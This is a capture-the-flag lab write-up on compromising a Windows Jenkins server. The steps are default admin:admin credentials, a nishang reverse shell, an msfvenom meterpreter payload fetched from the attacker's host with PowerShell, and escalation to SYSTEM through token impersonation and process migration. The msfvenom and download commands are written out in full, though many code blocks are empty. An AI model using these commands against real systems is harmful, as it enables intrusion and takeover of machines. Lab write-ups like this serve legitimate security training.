Initial Access
Exploiting Jenkins,
Jenkins is a tool used to create continuous integration/continuous development pipelines that allow developers to automatically deploy their code once they made changes to it.
First of all I am going to scan the machine, for this I only know that the machine does not respond to ping, and I only need TCP ports,
|
|
This is the output.
Port 80 is hosting a site, which tells me important informations:
I got a possible username and password: Bruce Wayne
And an email: alfred@wayneenterprises.com
But that’s it for now.
Port 8080 is where Jenkins is hosted.
Upon entering the page, there is a login portal, after trying “Bruce Wayne” and several other password, I am reminded that this is in the description of the room:
“common misconfiguration on a widely used automation server”
So i tried admin:admin, which worked.
Now I got control over Jenkins!
The first thing to do is searching for some type of tool that I can use to get a reverse shell:
https://github.com/samratashok/nishang
First I tried with the script console.
But it didn’t work because it can’t download the script like that, so I found a configure page under the project.
Because it has RDP open we can assume that the machine is running Windows.
I am going to use this script: “https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1”
Which I downloaded in my machine, after that I started a python server: (this will be started in the same directory as the script, that’s because jenkins will download the script thanks to the python server)
|
|
Then I start a listener:
|
|
And then used this script in the script console:
|
|
After that I build the config we got a shell!
|
|
We can see that we are the user alfred\bruce
|
|
Now I need the user flag, which I found in the user Desktop:
PS C:\Users\bruce\Desktop> ls
|
|
Now, I am going to switch this scuffed revshell in an imrpoved version, we can do this using the meterpreter shell.
Upgrading the shell
Leave your previous connection OPEN.
We create our payload:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.18.20.116 LPORT=4555 -f exe -o revshellps1.exe
After creating this payload, download it to the machine using the same method in the previous step:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.18.20.116:8000/revshellps1.exe','revshellps1.exe')"
Now that we have done that, we need to use Metasploit:
|
|
Once we run, we nee to go in our previous connection(The one we created with nc) and start the process:
|
|
You will find the shell under: C:\Program Files (x86)\Jenkins\workspace\project
Now that we have a stable shell, we can try to gain major privileges!
Privilege Escalation
First thing we do is:
whoami /priv
With this we can see all the Enabled privileges
(SeDebugPrivilege, SeImpersonatePrivilege) Those are the one that we find interessing.
Then we check for the available tokens:
impersonate_token
And we can see the BUILTIN\Administrators token available
So we try to impersonate the token:
|
|
Even though you have a higher privileged token, you may not have the permissions of a privileged user.
To go around that we can migrate to a process with the correct privileges.
First we use ps
to view the processes, then we grab the PID of services.exe, which we pick because is it normally a ssafe option.
and we migrate to that PID:
|
|
Now we should have full SYSTEM privileges!!